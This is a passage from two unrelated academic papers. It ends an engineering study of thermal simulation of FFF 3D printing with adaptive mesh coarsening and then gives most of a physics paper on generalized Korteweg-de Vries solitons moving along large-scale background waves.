graph, does not equal the prescribed nozzle temperature \(T_{n}\) of \(210^{\circ}\)C at any of the measuring locations. The temperature of the deposited filament was repeatedly measured to be significantly lower than the nozzle temperature. This observation was also made in [26]. Thus, instead of using the nozzle temperature in the numerical simulations, the average deposition temperature from all the experimental measurements of \(175^{\circ}\)C was used as the activation temperature. Figure 9: Experimental thermal measurements at various measuring locations ### Validation simulation framework Before experimentally validating the simulation framework, the validity of the simulation framework is presented by investigating the effect of the efficiency measures on the numerical accuracy. #### Numerical validation In the first simulation **M-1**, the block geometry was fully solved with the quiet method, so no remeshing occured between start and finish of the simulation. This is the default simulation to which other results will be compared. In the second simulation the mesh was solved with the hybrid activation method; remeshing occured every time one full layer was activated (**M-2**). In the third simulation, the mesh was solved with the coarsening framework, thus both remeshing and adaptive coarsening occured (**M-3**). The default remeshing and coarsening parameters are listed in table 3. The efficiency of the coarsening framework is measured by comparing the total computional time required for the simulations of M-1, M-2 and M-3. The results are listed in table 3 and shown in figure 10. A total number of 62,720 time steps was required to solve the full geometry for all of the models. It can be seen the inclusion of remeshing reduced the computational time to 50% of that of M-1. The application of both remeshing and coarsening reduced the computational time to 19% of that of the default model. 
Figure 10 shows a linear evolution of the number of dofs over time for M-2 since a fixed number of dofs was added each time the geometry was remeshed. In case of M-1 this number was constant over time as all the dofs were present from the start. When looking at the results for M-3, a clear effect of the adaptive coarsening can be seen; the number of dofs was significantly reduced each time coarsening of the mesh occurred. On average, the total number of dofs remained fairly constant and significantly lower than in M-1 and M-2. The numerical accuracy of the simulation framework is assessed by comparing the evolution of the temperature over time \(T(t)\) for the three different models M-1, M-2 and M-3. The \(T(t)\) results are presented in figure 10. There is very good agreement between the three models for all of the measurement points. The model with both remeshing and coarsening is perfectly capable of capturing the (re)heating peaks and cooling of the filament that is displayed by the finest mesh M-1. Thus, at a local level model M-3 agrees well with both M-1 and M-2. A global comparison of the temperature fields has also been made by looking at the temperature contour plots at various moments during the simulation. These are shown in figures 11 & 12. For M-1 only the active part of the mesh has been displayed. There is also great agreement between the fine and coarsened mesh in the global temperature profiles. Model M-3 is capable of accurately capturing the correct local and global solution as displayed in the fine mesh without any remeshing or coarsening. \begin{table} \begin{tabular}{l c c c c c c c c c} \hline & **M-1** & **M-2** & **M-3** & **M-4** & **M-5** & **M-6** & **M-7** & **M-8** & **M-9** \\ \hline \(\mathrm{nh_{add}}\) & n.a. & 1 & 1 & 2 & 4 & 1 & 1 & 1 & 1 \\ CF & n.a. & n.a. & 2 & 2 & 2 & 2 & 2 & n.a. & 2 \\ CLVL & n.a. & n.a. & 3 & 3 & 3 & 3 & 3 & n.a. & 3 \\ \(\varepsilon\) & n.a. & n.a. & 0.01 & 0.01 & 0.01 & 0.02 & 0.05 & n.a. & 0.05 \\ \(\alpha\) & 1 & 1 & 1 & 1 & 1 & 1 & 1 & 0.5 & 0.5 \\ \hline \(\mathrm{t_{c}}\) [-] & 1 & 0.5 & 0.19 & 0.19 & 0.22 & 0.16 & 0.16 & 0.35 & 0.24 \\ \hline \end{tabular} \end{table} Table 3: Computational times \(\mathrm{t_{c}}\) (relative to default model M-1) for models with varying remeshing & coarsening parameters Figure 10: Influence of remeshing and coarsening: M-1 vs. M-2 vs. M-3 Figure 11: Temperatures after solving 25% of the geometry. Left: Fine mesh (M-1), right: coarsened mesh (M-3). Cross-sectional plane at y=\(\frac{4}{7}\cdot l\) Figure 12: Temperatures after solving 75% of the geometry. Left: Fine mesh (M-1), right: coarsened mesh (M-3). Cross-sectional plane at y=\(\frac{4}{7}\cdot l\) ### Experimental validation The numerical results generated with model **M-3** are plotted against the experimental thermal measurements for each measuring point in figure 13. The overall trend in the \(T(t)\) evolution is captured well by the simulations. It can be seen that the temperatures are slightly underestimated in the simulation for point N1. This also happens to be the point which is most sensitive to the influence of the thermal boundary conditions as it is located at the bottom part of the printed sample (\(z=\frac{1}{10}\cdot h\)). There is great agreement between the experimental and numerical results for measuring point N2 and the deviations between the results for N3 are quite small as well (\(\approx 5\%\)).
For all measurement points it can be seen that the temperature at the first and second (re)heating peak differs between the simulation and the experiments. The average deposition temperature was used as the element activation temperature in the simulations, thus deviation from the experimental values was to be expected. During the experimental measurements a different deposition temperature was registered at each measurement point. The deviation in the second reheating peak is a direct result of the numerical load application; when an element is activated, the deposition temperature is prescribed at all nodes of that element (section 3.2). This seems to be an overestimation of what occurs in reality. Figure 13: Experimental validation of numerical model **M-3** ### Variation of numerical parameters The default remeshing and coarsening parameters as listed in table 3 were applied in simulations M-2 and M-3. Varying the parameters \(\mathrm{nh_{add}}\) and \(\varepsilon\) can influence the efficiency and/or accuracy of the simulations compared to the default model M-1. The first parameter that was varied is \(\mathrm{nh_{add}}\). This parameter influences the computational time as it controls the trade-off between the number of inactive dofs present in a remeshing step and the number of times remeshing occurs. To investigate this, the simulations were additionally performed for \(\mathrm{nh_{add}}\)=2 (**M-4**) and \(\mathrm{nh_{add}}\)=4 (**M-5**). Table 3 shows that the computational time is similar for the models with one (M-3) and two quiet layers (M-4). However, the computational time was increased by 15% when four quiet layers were added instead of one. This implies that remeshing often is more efficient, even though the preprocessing is carried out more often, than remeshing less frequently and carrying a larger number of dofs in each discretized geometry. The accuracy is also compared by looking at \(T(t)\) of the aforementioned models (figure 14) and the temperature contour plots at the last time step of the last remeshing step (figure 15). There is great agreement between the fine model and the coarsened models with varying \(\mathrm{nh_{add}}\). Next, the effect of coarsening parameter \(\varepsilon\) was investigated. Since the simulation M-3 with \(\varepsilon\)=0.01 already yielded very accurate results compared to the results of the fine model, the value of \(\varepsilon\) was varied between 0.01 and 0.05 for **M-6** and **M-7** (table 3). The comparison of \(T(t)\) between the fine model M-1 and the models with varying \(\varepsilon\) is shown in figure 16. It can be seen that even for \(\varepsilon\)=0.05, there is still good agreement with the fine model, especially at the initial stages of the simulation. The heating and reheating peaks upon element activation were accurately captured. Small differences can be observed after the influence of the nozzle fades for \(\varepsilon\)=0.05 (M-7), as the temperatures measured in M-7 are approximately 5% higher compared to M-1. This is an indicator that coarsening occurred too early at a certain point in the simulation. However, the results at node 1 show that this difference decreases again as a steady-state is approached. The global temperatures are displayed for the last time step in the last remeshing step (figure 17). The results are again very similar, but it can be seen that M-3 only reached two levels of coarsening whereas M-6 and M-7 both reached three levels of coarsening.
This explains the difference in computational time, which is listed for each model in table 3. For \(\varepsilon\)=0.05 the computational time was reduced by approximately 15% compared to \(\varepsilon\)=0.01. Figure 14: Influence of \(\rm{nh_{add}}\) Figure 15: Temperatures in last time step of the final coarsened meshes for models with varying \(\rm{nh_{add}}\). Cross-sectional plane at y=\(\frac{4}{7}\cdot l\) Figure 16: Influence of \(\varepsilon\) Figure 17: Temperatures in last time step of the final coarsened meshes for models with varying \(\varepsilon\). Cross-sectional plane at y=\(\frac{4}{7}\cdot l\) ### Homogenized infill structures The applicability of the simulation framework on geometries with an air-filled infill pattern was tested in a similar fashion as was done in the previous section: the results of the thermal analysis on the geometry with a fine mesh were compared to the results of the thermal analysis on the same geometry but with a discretization that included adaptive coarsening. Remeshing was applied in both simulations. A rectilinear infill pattern with an infill density of 50% was applied in both models. The model without any coarsening is described by model **M-8** whereas the model which includes coarsening is described by model **M-9**. All remeshing and coarsening parameters for these models are listed in table 3. The meshes and temperature contour plots from the last remeshing step are shown in figures 18 & 19 respectively. Figure 19 shows that there is very good agreement between M-8 and M-9. The temperatures in the fine and coarsened parts of the mesh in model M-9 coincided very well with those of the fully fine mesh (M-8). It confirms that the homogenized material properties that were assigned to the coarse elements managed to capture the thermal behaviour of the air-PLA infill quite well. Model M-9 reached three levels of coarsening, even though the number of fine non-coarsened layers was relatively high (figure 18). Compared to the geometry with a dense infill (M-7 from figure 17), there were more fine layers present in the coarsened model where the infill density is 50%. It seems that the coarsening condition was satisfied more easily once the elements were homogenized, compared to the first coarsening level where the transition occurred from the heterogeneous mesh to the homogenized mesh. When comparing the computational times, it can be seen that M-8 was solved significantly faster than its dense counterpart M-2, despite having the same total number of dofs. The difference can be attributed to the decrease in the total number of time steps for M-8. Even though the coarsened model M-9 was still more efficient than M-8, it lagged behind the efficiency of the densely coarsened model M-7. It seems that the significant increase in the number of dofs outweighed the decrease in the total number of time steps. ### Bridge Geometry All of the numerical methods presented in the previous sections were tested on a bridge geometry (figure 20). This geometry is inspired by [14] and a rectilinear infill pattern with an infill percentage of 25% was applied (figure 20). The homogenized material properties assigned to the coarsened elements were calculated with equations 12-16. All process parameters which were used to simulate the printing process are listed in table 2. A time step size of 0.267 s was applied. The initial and boundary conditions were applied in a similar fashion as for the block geometry (section 3.3).
The main difference is that the bridge geometry has additional external free surfaces which were subjected to convective heat transfer. The coarsening parameters were chosen as follows: * MLVL=3 * CF=2 * nh\({}_{\rm add}\)=2 * \(\varepsilon\)=0.05 Figure 18: Mesh for infill geometries with a 50% infill density in final remeshing step. Cyan: PLA elements, purple: air elements, red: homogenized elements Figure 19: Temperatures in the last time step of the final meshes with an infill geometry. Left: Fine mesh, right: coarsened mesh. Cross-sectional plane at y=\(\frac{4}{7}\cdot l\) The final coarsened mesh from the last remeshing step (figure 20) shows that three levels of coarsening were reached in the majority of the geometry. There are fewer fine layers present compared to the block geometry (figure 18), which could be attributed to the larger overall printing time of the bridge, more cooling time for each printed layer and thus easier satisfaction of the coarsening condition. The maximum number of coarsening levels was restricted by the width of the bridge pillars, but the significant number of layers in the coarsest level would otherwise allow for additional coarsening levels. The temperature contour plots are shown in figure 21 for various stages of the printing process. For each remeshing step shown, the temperatures are plotted as the PLA filaments are printed in the \(0^{\circ}\)-direction (global x-direction). It can be seen that the coarsened layers have an even temperature distribution, whereas the influence of the printed filaments only reaches a few (fine) layers below the printed layer. This is an observation which is in agreement with the experimental measurements. The number of fine layers remains fairly constant throughout the various printing stages. Overall, the presented simulation framework also seems to work well on more complex geometries. Figure 20: Bridge model Figure 21: Temperature contour plots during various printing stages of the bridge geometry ## 5 Conclusion A simulation framework has been presented for the transient thermal analysis of the fused filament fabrication (FFF) printing process. A hybrid element activation approach and adaptive coarsening have been applied to reduce the computational expense that is normally associated with heat transfer simulations of the FFF printing process. Additionally, the objective was to minimize the loss of accuracy and to have an accurate representation of the deposition physics. The simulation framework has been validated with experimental thermal measurements that were performed during the printing of a block. The comparison showed good agreement between the results, especially towards the center of the printed block. An important finding of this research is that the activation temperature in the simulations has to be significantly lower than the nozzle temperature. This is often not considered in heat transfer simulations of the FFF printing process. The applicability of the framework was also assessed by looking at its numerical accuracy and efficiency for geometries with both a dense infill and an air-filled infill pattern. The computational time of the simulations on meshes where both remeshing and adaptive coarsening were applied was approximately one fifth of the computational time of simulations on a geometry with a fine mesh without any efficiency measures. Moreover, great agreement was found between the models, both locally and globally.
Good agreement was also found between the models in which the part had an air-filled infill pattern. The homogenized material properties based on the infill density of the printed part, which were assigned to the coarsened part of the mesh, were able to capture the thermal behaviour of the heterogeneous material well. Overall, the framework shows great potential for efficiently simulating heat transfer in the FFF printing process. The framework could be further improved by optimization of the time step size and a more accurate load prescription. The next step would be to extend the simulation framework to thermo-mechanical simulations for residual stress prediction.
2307.12321
Propagation of generalized Korteweg-de Vries solitons along large-scale waves
We consider propagation of solitons along large-scale background waves in the generalized Korteweg-de Vries (gKdV) equation theory when the width of the soliton is much smaller than the characteristic size of the background wave. Due to this difference in scales, the soliton's motion does not affect the dispersionless evolution of the background wave. We obtained the Hamilton equations for the soliton's motion and derived simple relationships which express the soliton's velocity in terms of a local value of the background wave. Solitons' paths obtained by integration of these relationships agree very well with the exact numerical solutions of the gKdV equation.
A. M. Kamchatnov, D. V. Shaykin
2023-07-23T13:18:18Z
http://arxiv.org/abs/2307.12321v2
# Propagation of generalized Kortweg-de Vries solitons along large scale waves ###### Abstract We consider propagation of solitons along large scale background waves in the generalized Korteweg-de Vries (gKdV) equation theory when the width of the soliton is mach smaller than the characteristic size of the background wave. Due to this difference in scales, the soliton's motion does not affect the dispersionless evolution of the background wave. We obtained the Hamilton equations for soliton's motion and derived simple relationships which express the soliton's velocity in terms of a local value of the background wave. Solitons' paths obtained by integration of these relationships agree very well with the exact numerical solutions of the gKdV equation. pacs: 05.45.Yv, 47.35.Fg ## I Introduction Perturbation theory for solitons has a long history and a number of publications is devoted to different approaches to it which span from simple variational estimates to rigorous mathematical investigations based on the inverse scattering transform method (see, e.g., review articles [1; 2] and references therein). In spite of that, there still exist some specific situations where the developed so far methods are either insufficient of too complicated for practical use and simpler approaches are needed. One such a situation refers to propagation of solitons along a large scale background wave \(u=\overline{u}(x,t)\), where \(\overline{u}(x,t)\) obeys in the simplest case of unidirectional propagation to the Hopf-like equation \[\overline{u}_{t}+V_{0}(\overline{u})\overline{u}_{x}=0. \tag{1}\] If we denote a characteristic width of a soliton as \(\sim\kappa^{-1}\), then it is assumed that \(\overline{u}(x,t)\) changes considerably at distances about \(l\) much greater than \(\sim\kappa^{-1}\), so that \((\kappa l)^{-1}\) is a small parameter of the theory. At the same time Eq. (1) is just a dispersionless approximation of the nonlinear wave equation under consideration for unidirectional wave propagation. It is supposed that soliton's propagation does not influence on evolution of the background wave, so this equation does not contain any perturbation terms. This scheme corresponds to the generally accepted qualitative picture according to which the soliton's propagation through a non-uniform and varying with time background can be treated as motion of a classical particle under action of external time-dependent field. Consequently, the first task is to derive equations for soliton's motion along the evolving background wave \(u=\overline{u}(x,t)\). In fact, this problem was solved for Korteweg-de Vries (KdV) solitons in Refs. [3; 4] (see also [5; 6]), but this rigorous approach was quite involved mathematically and was not, apparently, widely used in physical literature. Recently this problem was reconsidered in Ref. [7] for propagation of KdV solitons along rarefaction waves by different methods including the Whitham theory of modulations, and this approach was extended to the problem of propagation of KdV solitons along dispersive shock waves (DSWs). Application of the Whitham modulation theory to this type of problems seems very natural since propagation of the soliton edge of a DSW reduces exactly to the motion of the leading soliton along the background dispersionless wave. For example, this approach easily reproduces equations of motion [8] in Bose-Einstein condensate in case of absence of external perturbations (see Ref. [9]). 
In this paper we combine some ideas developed earlier in the Whitham modulation theory with elementary results of the perturbation theory and reproduce very simply the Hamilton equations of Refs. [3; 4] for soliton's motion. These equations can be integrated to give a useful relationship \[\kappa=\kappa(\overline{u}) \tag{2}\] between the soliton's inverse half-width \(\kappa\) and the background wave amplitude \(\overline{u}\). Since soliton's velocity \(V\) can be expressed in terms of the dispersion relation \(\omega=\omega(k,\overline{u})\) for linear waves with wave number \(k\) propagating along the constant background \(\overline{u}\) by the Stokes formula [10] (see also [11] and references therein) \[V=\frac{\omega(i\kappa,\overline{u})}{i\kappa}, \tag{3}\] then substitution of Eq. (2) gives the equation \[\frac{dx}{dt}=V(\overline{u}(x,t)) \tag{4}\] for soliton's path \(x=x(t)\) which can be easily integrated. The relationship (2) can be treated as an analytical continuation of the relationship between the carrier wave number \(k\) of a short-wavelength wave packet and the background amplitude \(\overline{u}\) which follows from the Hamilton theory of propagation of such packets [12] as well as from the Whitham theory for propagation of small-amplitude edges of dispersive shock waves [13]. This observation allows us to extend the theory to the generalized KdV equation and this is the main task of the present article. Our analytical results are confirmed by exact numerical solutions of particular problems of propagation of solitons along large-scale background waves. ## II Motion of KdV soliton along a background wave The KdV equation \[u_{t}+6uu_{x}+u_{xxx}=0 \tag{5}\] describes evolution of the whole wave structure \[u(x,t)=\overline{u}(x,t)+u_{s}(x,t) \tag{6}\] which consists of the background large-scale wave \(\overline{u}(x,t)\) obeying in our approximation to the Hopf equation \[\overline{u}_{t}+6\overline{u}\,\overline{u}_{x}=0 \tag{7}\] and the soliton \[u_{s}(x,t)=\frac{\kappa^{2}}{2}\cdot\frac{1}{\cosh^{2}[\kappa(x-x_{s}(t))/2]}, \tag{8}\] where \(x_{s}(t)\) denotes the instant position of the soliton and \(\kappa=\kappa(t)\) is its time-dependent inverse half-width. Our first task is to derive the Hamilton equations for the particle-like motion of solitons. To this end, we notice that the dispersion relation for linear waves propagating along constant background \(u=\overline{u}=\text{const}\) reads \[\omega(k,\overline{u})=6\overline{u}k-k^{3}. \tag{9}\] Then, according to the Stokes rule (3), the soliton's velocity is given by \[\frac{dx}{dt}=\frac{\omega(i\kappa)}{i\kappa}=6\overline{u}(x,t)+\kappa^{2}= \frac{\partial H}{\partial p}, \tag{10}\] where we assume that the background \(\overline{u}=\overline{u}(x,t)\) has the value corresponding to the position \(x\) of the soliton at the instant \(t\). We expressed this velocity in Eq. (10) in Hamiltonian form where the Hamiltonian \(H=H(x,p)\) and the canonical momentum are to be determined. The inverse half-width \(\kappa\) must be some function of \(p\). We write this dependence in the form \(\kappa^{2}=f(p)\), so integration of Eq. (10) gives \[H=6\overline{u}p+\int f(p)dp. \tag{11}\] To find \(f(p)\), we need one more equation and, following Ref. [7], we get it from the first non-trivial conservation law for solitons. Substitution of Eq. 
(6) into (5) gives \[u_{s,t}+6(\overline{u}u_{s})_{x}+6u_{s}u_{s,x}+u_{s,xxx}=-F[\overline{u}(x,t)], \tag{12}\] where \[F[\overline{u}(x,t)]=\overline{u}_{t}+6\overline{u}\,\overline{u}_{x}+ \overline{u}_{xxx}. \tag{13}\] We assume that \(\overline{u}(x,t)\) is a smooth solution of the Hopf equation (7), so the dispersion term in Eq. (13) can be neglected and we can take \(F=0\). Then an easy calculation with the use of several integrations by parts yields \[\begin{split}&\frac{d}{dt}\int_{-\infty}^{\infty}u_{s}^{2}dx=-12 \int_{-\infty}^{\infty}u_{s}(\overline{u}u_{s})_{x}dx\\ &=-6\int_{-\infty}^{\infty}\overline{u}_{x}u_{s}^{2}dx\approx-6 \overline{u}_{x}(x,t)\int_{-\infty}^{\infty}u_{s}^{2}dx,\end{split} \tag{14}\] where we assume that since the distribution (8) has a form of a narrow peak, the smooth function \(\overline{u}_{x}\) can be replaced with good enough accuracy by its value at the soliton's position \(x\) and the moment \(t\). With the use of Eq. (8) we find at once that \[\int_{-\infty}^{\infty}u_{s}^{2}dx=\frac{2}{3}\kappa^{3}, \tag{15}\] so Eq. (14) transforms to the needed equation \[\frac{d\kappa^{2}}{dt}=-4\overline{u}_{x}\kappa^{2}. \tag{16}\] Now, substitution of Eqs. (11) and (16) into the Hamilton equation \[\frac{dp}{dt}=-\frac{\partial H}{\partial x}\] gives with account of \(p=p(f)=p(\kappa^{2})\) \[\frac{dp}{df}\cdot\frac{d\kappa^{2}}{dt}=-\frac{dp}{df}\cdot 4\overline{u}_{x}f=- \frac{\partial H}{\partial x}=-6\overline{u}_{x}p,\] and, consequently, \(2dp/p=3df/f\), so \(p=f^{3/2}\) or \(f=p^{2/3}\), where we have chosen the integration constant equal to unity for simplicity of the notation. At last, substitution of the function \(f=p^{2/3}\) into Eq. (11) yields the Hamiltonian in the form \[H=6\overline{u}(x,t)p+\frac{3}{5}p^{5/3}. \tag{17}\] Soliton moves along the background wave \(\overline{u}=\overline{u}(x,t)\) according to the Hamilton equations \[\begin{split}&\frac{dx}{dt}=\frac{\partial H}{\partial p}=6 \overline{u}(x,t)+p^{2/3},\\ &\frac{dp}{dt}=-\frac{\partial H}{\partial x}=-6\overline{u}_{x} (x,t)p.\end{split} \tag{18}\] Equations (17), (18) coincide up to the notation with the equations obtained in Refs. [3; 4; 5] by a different method. We have arrived at the Hamiltonian system (18) which remains Hamiltonian when \(\overline{u}(x,t)\) evolves according to the hydrodynamic equation (7). This means that the Poincare-Cartan integral invariant [14; 15] \[I_{0}=\oint(p\delta x-H\delta t) \tag{19}\] is preserved by the hydrodynamic flow (7). As was shown in Ref. [16], this implies that there exists the dependence \(p=p(\overline{u})\) determined by the equation \[\frac{dp}{d\overline{u}}=\frac{\partial H/\partial\overline{u}}{V_{0}(\overline {u})-\partial H/\partial p}. \tag{20}\] In our case with \(V_{0}=6\overline{u}\) and \(H\) defined by Eq. (17) this equation takes the form \(p^{-1/3}dp=-6d\overline{u}\), so we get \[p^{2/3}=-4\overline{u}(x,t)+q, \tag{21}\] where \(q\) is an integration constant. According to our definitions above, \(p^{2/3}=f=\kappa^{2}\), so this relation can be written as \[\kappa^{2}=-4\overline{u}(x,t)+q. \tag{22}\] At last, substitution of Eq. (21) into the first Hamilton equation (18) gives a very simple equation for the soliton's path \[\frac{dx}{dt}=2\overline{u}(x,t)+q, \tag{23}\] where it is assumed that \(\overline{u}(x,t)\) is a known solution of Eq. (7) and \(q\) is determined by the initial soliton's velocity. It is worth noticing that Eq. 
(20) transformed from \(p\) to the variable \(\kappa=p^{1/3}\) coincides with the equation introduced by G. A. El in Ref. [13] for description of motion of the soliton edge of dispersive shock waves generated from evolution of step-like initial discontinuities. Eq. (22) can be obtained in a simpler way with help of the Stokes reasoning [10] based on observation that the exponentially small soliton tails \(u_{s}\propto\exp[\pm\kappa(x-V_{s}t)]\) and the small-amplitude harmonic waves \(\propto\exp[i(kx-\omega t)]\) obey the same linearized equations, so the transformation \(k\mapsto i\kappa\) converts the phase velocity \(V(k)=\omega(k)/k\) into the soliton's velocity (3). From this point of view, the formula (3) for the soliton velocity is just an analytical continuation of the formula \(V(k)=\omega(k)/k\) for the phase velocity from the real \(k\)-axis to its imaginary axis in the complex \(k\)-plane. This idea of analytical continuation can be applied to some other expressions obtained for motion of high-frequency wave packets converting them to relations between the soliton's parameters (see Ref. [16]). For example, motion of a localized wave packet is described by its coordinate \(x=x(t)\) and carrier wave number \(k=k(t)\) which obey the Hamilton equations \[\frac{dx}{dt}=\frac{\partial\omega}{\partial k},\qquad\frac{dk}{dt}=-\frac{ \partial\omega}{\partial x}. \tag{24}\] Again, when such a packet propagates along a background wave which evolves according to Eq. (7), the wave number \(k\) is a function of \(\overline{u}\) determined by the equation [12; 13] \[\frac{dk}{d\overline{u}}=\frac{\partial\omega/\partial\overline{u}}{V_{0}( \overline{u})-\partial\omega/\partial k}, \tag{25}\] which in the KdV equation case (7) and (9) gives at once \[k^{2}=4\overline{u}-q, \tag{26}\] where \(q\) is an integration constant. Analytical continuation of this formula to soliton's region according to the Stokes rule \(k\mapsto i\kappa\) reproduces Eq. (22). The advantage of this method, based on the well-established asymptotic theory of propagation of high-frequency wave packets, is that it does not need derivation of Eqs. (18) or (20). At last we notice that formulas (22) and (26) also follow from the Whitham modulation equations [17; 18] at their soliton and small-amplitude edges, correspondingly. Let us illustrate this theory by an example of propagation of a KdV soliton with the initial value \(\kappa=4\), that is the initial amplitude \(A=\kappa^{2}/2=8\), which starts its motion at the point \(x=0\) at the moment \(t=0\). The background wave has the initial profile \[\overline{u}(x,0)=(x/8)^{2},\qquad x>0. \tag{27}\] Then we obtain from Eq. (7) the profile \[\overline{u}(x,t)=\frac{4}{9t^{2}}\left(\sqrt{1+\frac{3}{8}xt}-1\right)^{2}, \qquad x>0, \tag{28}\] at any moment of time \(t\geq 0\). Since the initial velocity equals to \(q=\kappa^{2}=16\), Eq. (23) takes the form \[\frac{dx}{dt}=\frac{8}{9t^{2}}\left(\sqrt{1+\frac{3}{8}xt}-1\right)^{2}+16 \tag{29}\] and it should be solved with the initial condition \(x(0)=0\). The plot of this solution is shown in Fig. 1(a) by a solid line and dots correspond to soliton's positions obtained from numerical solution of the full KdV equation (5) with the initial profile composed of the background wave (27) and the soliton (8) located at \(x=0\) with \(\kappa=4\). The Figure 1: (a) Soliton’s path \(x(t)\) obtained from solution of Eq. (29) (solid line) and from exact numerical solution of the KdV equation (5). 
(b) Change of the soliton’s amplitude \(A\) during propagation of the soliton along the background wave (28); solid line corresponds to Eq. (30) and dots to the numerical solution of the KdV equation. solid line in Fig. 1(b) shows the analytical dependence (see Eq. (22)) \[A=\frac{\kappa^{2}}{2}=8-2\overline{u}(x(t),t) \tag{30}\] of the soliton's amplitude on time \(t\) and dots correspond again to numerical values of the amplitude. As we see, our approximate analytical theory agrees very well with the exact numerical solution. ## III Generalized KdV equation Here we shall apply the above approach to the generalized KdV (gKdV) equation \[u_{t}+V_{0}(u)u_{x}+u_{xxx}=0, \tag{31}\] where \(V_{0}(u)\) is a monotonously growing function of \(u\), \(V_{0}(0)=0\). If we look for a soliton solution in the form \(u=u(\xi)\), \(\xi=x-Vt\), when it propagates along a constant background \(u\rightarrow\overline{u}\) as \(|\xi|\rightarrow\infty\), then an easy calculation lead to the equation \[\begin{split} u_{\xi}^{2}=G(u),\quad G(u)=& V(u- \overline{u})^{2}-2\left[\Phi(u)-\Phi(\overline{u})\right]\\ &+2\Phi^{\prime}(\overline{u})(u-\overline{u}),\end{split} \tag{32}\] where \[\Phi(u)=\int_{0}^{u}du^{\prime}\int_{0}^{u^{\prime}}V_{0}(u^{\prime\prime})du^ {\prime\prime}. \tag{33}\] The expression in the right-hand side of Eq. (32) has a double zero at \(u=\overline{u}\). One more zero \(u=u_{m}>\overline{u}\) defines the soliton's amplitude by the equation \[\frac{1}{2}V(u_{m}-\overline{u})^{2}=[\Phi(u_{m})-\Phi(\overline{u})]-\Phi^{ \prime}(\overline{u})(u_{m}-\overline{u}), \tag{34}\] so that \[A=u_{m}-\overline{u}. \tag{35}\] The soliton's profile is determined in implicit form by the quadrature \[\xi=\int_{u}^{u_{m}}\frac{du}{\sqrt{G(u)}}. \tag{36}\] We assume that this solution is stable. For example, in case of \[V_{0}(u)=6u^{\gamma} \tag{37}\] the soliton solution is stable, if \(0<\gamma<4\) (see Ref. [19]). In a particular case of modified KdV (mKdV) equation with \(\gamma=2\) the soliton solution can be written in explicit form \[u(\xi)=\overline{u}+\frac{V-6\overline{u}^{2}}{\sqrt{V-2\overline{u}^{2}}\cosh (\sqrt{V-6\overline{u}^{2}}\xi)+2\overline{u}}. \tag{38}\] Consequently, in this case the inverse half-width \(\kappa\) is related with the soliton's velocity \(V\) by the formula \[\kappa^{2}=V-6\overline{u}^{2} \tag{39}\] and the amplitude is equal to \[A=\frac{V-6\overline{u}^{2}}{\sqrt{V-2\overline{u}^{2}}+2\overline{u}}. \tag{40}\] Now we turn to the problem of propagation of solitons along smooth large scale background waves. In case of the gKdV equation (31) we get the dispersion relation for harmonic waves \[\omega(k,\overline{u})=V_{0}(\overline{u})k-k^{3}. \tag{41}\] It is assumed that the wavelength is much smaller than a characteristic size of the background wave \(\overline{u}\) whose evolution is described by Eq. (1). Now Eq. (25) gives (see [11; 13]) \[k^{2}=\frac{2}{3}V_{0}(\overline{u})-q, \tag{42}\] \(q\) is an integration constant. Analytical continuation of this formula to the soliton region yields the expression for the soliton's inverse half-width \[\kappa^{2}=q-\frac{2}{3}V_{0}(\overline{u}). \tag{43}\] Consequently, the Stokes rule (3) gives the expression for the soliton's velocity \[\frac{dx}{dt}=V=\frac{\omega(i\kappa,\overline{u})}{i\kappa}=V_{0}(\overline{ u})+\kappa^{2}=\frac{1}{3}V_{0}(\overline{u})+q, \tag{44}\] where the integration constant \(q\) is determined by the initial conditions. 
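For illustration, a minimal numerical integration of Eq. (44) is sketched below in Python (the code is our own and is not part of the original analysis). It uses the KdV case of Section II, where \(V_{0}(u)=6u\), the background is given by Eq. (28) and \(q=16\), so that Eq. (44) reduces to Eq. (29); the integration horizon \(t_{\mathrm{end}}=1\) is an arbitrary choice.

```python
import numpy as np

def ubar(x, t):
    """Background wave of Eq. (28); reduces to (x/8)**2 as t -> 0 (Eq. (27))."""
    if t < 1e-8:
        return (x / 8.0) ** 2
    return 4.0 / (9.0 * t**2) * (np.sqrt(1.0 + 3.0 * x * t / 8.0) - 1.0) ** 2

def soliton_velocity(x, t, q=16.0):
    """Right-hand side of Eq. (29): dx/dt = 2*ubar(x, t) + q (KdV case of Eq. (44))."""
    return 2.0 * ubar(x, t) + q

def rk4_path(t_end=1.0, dt=1e-3, q=16.0):
    """Integrate the soliton path x(t) with classical RK4, starting from x(0) = 0."""
    n = int(round(t_end / dt))
    t, x = 0.0, 0.0
    path = [(t, x)]
    for _ in range(n):
        k1 = soliton_velocity(x, t, q)
        k2 = soliton_velocity(x + 0.5 * dt * k1, t + 0.5 * dt, q)
        k3 = soliton_velocity(x + 0.5 * dt * k2, t + 0.5 * dt, q)
        k4 = soliton_velocity(x + dt * k3, t + dt, q)
        x += dt * (k1 + 2 * k2 + 2 * k3 + k4) / 6.0
        t += dt
        path.append((t, x))
    return np.array(path)

path = rk4_path(t_end=1.0)
t_f, x_f = path[-1]
amplitude = 8.0 - 2.0 * ubar(x_f, t_f)   # Eq. (30): A = kappa^2/2 = 8 - 2*ubar
print(f"x({t_f:.2f}) = {x_f:.3f},  soliton amplitude A = {amplitude:.3f}")
```

The same loop applies to the general case: only `soliton_velocity` has to be replaced by \(\tfrac{1}{3}V_{0}(\overline{u}(x,t))+q\) with the appropriate background solution of Eq. (1).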
Integration of this equation with known law \(\overline{u}=\overline{u}(x,t)\) of evolution of the background wave gives the path \(x=x(t)\) of the soliton. In case of the mKdV equation we get \[\frac{dx}{dt}=V=2\overline{u}^{2}(x,t)+q \tag{45}\] and substitution of this expression for \(V\) to Eq. (40) gives the dependence of the amplitude along the soliton's path, \[A(t)=\sqrt{q}-2\overline{u}(x(t),t). \tag{46}\] Of course, this result can also be obtained directly from Eq. (34), which is applicable to the general nonlinearity function \(V_{0}(u)\), with the use of Eqs. (35) and (44). The Hamilton equations for soliton's motion in case of the gKdV equation can be obtained without much difficulty. We denote again \(\kappa^{2}=f(p)\) and integration of the equation \[\frac{dx}{dt}=\frac{\partial H}{\partial p}=V=V_{0}(\overline{u})+\kappa^{2} =V_{0}(\overline{u})+f(p)\] gives \[H=V_{0}(\overline{u})p+\int f(p)dp. \tag{47}\] Differentiation of Eq. (43) along the soliton's path yields \[\frac{d\kappa^{2}}{dt}=-\frac{2}{3}V_{0}^{\prime}(\overline{u})(\overline{u}_{t }+V\overline{u}_{x})=-\frac{2}{3}V_{0}^{\prime}(\overline{u})\overline{u}_{x} \kappa^{2}.\] Then the second Hamilton equation \(dp/dt=-\partial H/\partial x\) gives 